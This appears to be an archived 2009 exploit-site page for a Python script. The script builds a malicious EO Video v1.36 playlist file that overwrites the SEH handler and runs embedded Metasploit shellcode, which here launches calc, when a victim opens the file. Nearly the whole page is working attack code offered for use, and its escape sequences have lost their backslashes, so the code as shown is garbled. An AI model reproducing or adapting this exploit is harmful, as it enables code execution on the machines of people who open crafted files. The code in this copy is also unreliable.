EO Video v1.36 PlayList SEH Overwrite Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : EO Video v1.36 PlayList SEH Overwrite Exploit
# Published : 2009-03-09
# Author : His0k4
# Previous Title : mks_vir 9b < 1.2.0.0b297 (mksmonen.sys) Privilege Escalation Exploit
# Next Title : RadASM 2.2.1.5 (.RAP File) Local Stack Overflow Exploit

#!/usr/bin/python
#usage: exploit.py
print "**************************************************************************"
print "[*] EO Video v1.36 PlayList Seh Overwrite Exploitn"
print "[*] Author: j0rgan"
print "[*] Seh Exploitation : His0k4"
print "[*] Tested on: Windows XP SP2 (Fr)n"
print "[*] Greetings to: All friends & Muslims HacKerS (DZ)"
print "**************************************************************************"

buff = "x41" * 1356

next_seh = "xEBx06x41x41"

seh = "x14x1Ex5Bx58" #pop pop ret msgsm32 .acm

header1= (																		
	"x3Cx45x4Fx50x6Cx61x79x6Cx69x73x74x3Ex0Ax3Cx50x6Cx61x79x6C"
	"x69x73x74x3Ex0Ax3Cx46x6Fx6Cx64x65x72x4Cx69x73x74x3Ex0Ax3C"
	"x46x6Fx6Cx64x65x72x3Ex0Ax3Cx4Ex61x6Dx65x3Ex6Ex65x73x74x6F"
	"x3Cx2Fx4Ex61x6Dx65x3Ex0Ax3Cx54x72x75x65x46x72x65x71x75x65"
	"x6Ex63x79x3Ex31x3Cx2Fx54x72x75x65x46x72x65x71x75x65x6Ex63"
	"x79x3Ex0Ax3Cx2Fx46x6Fx6Cx64x65x72x3Ex0Ax3Cx46x6Fx6Cx64x65"
	"x72x3Ex0Ax3Cx4Ex61x6Dx65x3Ex6Ex65x73x74x6Fx3Cx2Fx4Ex61x6D"
	"x65x3Ex0Ax3Cx54x72x75x65x46x72x65x71x75x65x6Ex63x79x3Ex31"
	"x3Cx2Fx54x72x75x65x46x72x65x71x75x65x6Ex63x79x3Ex0Ax3Cx2F"
	"x46x6Fx6Cx64x65x72x3Ex0Ax3Cx2Fx46x6Fx6Cx64x65x72x4Cx69x73"
	"x74x3Ex0Ax3Cx50x72x6Fx6Ax65x63x74x45x6Cx65x6Dx65x6Ex74x3E"
	"x0Ax3Cx4Ex61x6Dx65x3E")
	
header2= (
	"x3Cx2Fx4Ex61x6Dx65x3Ex0Ax3Cx53x74x61x72x74x54x69x6Dx65x3E"
	"x30x3Cx2Fx53x74x61x72x74x54x69x6Dx65x3Ex0Ax3Cx45x6Ex64x54"
	"x69x6Dx65x3Ex30x3Cx2Fx45x6Ex64x54x69x6Dx65x3Ex0Ax3Cx4Dx65"
	"x64x69x61x53x69x7Ax65x3Ex0Ax3Cx57x69x64x74x68x3Ex2Dx31x3C"
	"x2Fx57x69x64x74x68x3Ex0Ax3Cx48x65x69x67x68x74x3Ex2Dx31x3C"
	"x2Fx48x65x69x67x68x74x3Ex0Ax3Cx2Fx4Dx65x64x69x61x53x69x7A"
	"x65x3Ex0Ax3Cx53x74x61x74x65x3Ex33x30x32x31x36x3Cx2Fx53x74"
	"x61x74x65x3Ex0Ax3Cx46x6Fx6Cx64x65x72x50x6Fx73x69x74x69x6F"
	"x6Ex49x6Ex64x65x78x3Ex30x3Cx2Fx46x6Fx6Cx64x65x72x50x6Fx73"
	"x69x74x69x6Fx6Ex49x6Ex64x65x78x3Ex0Ax3Cx2Fx50x72x6Fx6Ax65"
	"x63x74x45x6Cx65x6Dx65x6Ex74x3Ex0Ax3Cx2Fx50x6Cx61x79x6Cx69"
	"x73x74x3Ex5Cx6Ex3Cx2Fx45x4Fx50x6Cx61x79x6Cx69x73x74x3E")
	

# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
shellcode = (
	"x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x35"
	"x9cxf7xbcx83xebxfcxe2xf4xc9x74xb3xbcx35x9cx7cxf9"
	"x09x17x8bxb9x4dx9dx18x37x7ax84x7cxe3x15x9dx1cxf5"
	"xbexa8x7cxbdxdbxadx37x25x99x18x37xc8x32x5dx3dxb1"
	"x34x5ex1cx48x0exc8xd3xb8x40x79x7cxe3x11x9dx1cxda"
	"xbex90xbcx37x6ax80xf6x57xbex80x7cxbdxdex15xabx98"
	"x31x5fxc6x7cx51x17xb7x8cxb0x5cx8fxb0xbexdcxfbx37"
	"x45x80x5ax37x5dx94x1cxb5xbex1cx47xbcx35x9cx7cxd4"
	"x09xc3xc6x4ax55xcax7ex44xb6x5cx8cxecx5dx6cx7dxb8"
	"x6axf4x6fx42xbfx92xa0x43xd2xffx96xd0x56x9cxf7xbc"
    )

exploit = header1 + buff + next_seh + seh + shellcode + header2

try:
    out_file = open("exploit.eop",'w')
    out_file.write(exploit)
    out_file.close()
    print "Exploit File Created!nNow Open it :)"
except:
    print "Error"

# www.Syue.com [2009-03-09]